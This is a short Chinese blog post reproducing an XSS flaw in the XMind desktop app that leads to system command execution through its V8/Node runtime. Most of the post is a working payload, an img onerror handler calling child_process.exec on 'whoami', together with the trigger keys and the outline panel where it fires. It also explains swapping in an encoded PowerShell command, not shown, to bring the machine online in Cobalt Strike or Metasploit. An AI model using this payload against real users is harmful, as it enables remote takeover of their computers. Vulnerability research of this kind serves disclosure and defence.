XMind-XSS-V8内核命令执行复现

0x00 前言

测试环境：

XMind 202005082128

0x01 payload（需要在大纲板块进行触发）

<img src=x onerror="const exec = require('child_process').exec;exec('whoami').stdout.on('data', function (data) {alert(data);})">

0x02 触发键

shift 
control 
option 
command

0x03 漏洞复现

1、命令执行

whoami

2、扩展上线CS

XSS执行系统命令，内核V8，上线到CS或者MSF，替换whoami，

通过对powershell进行编码，然后替换payload进行上线CS

payload：

<img src=x onerror="const exec = require('child_process').exec;exec('powershell（……）').stdout.on('data', function (data) {alert(data);})">

 

转载请注明：Adminxe's Blog » XMind-XSS-V8内核命令执行复现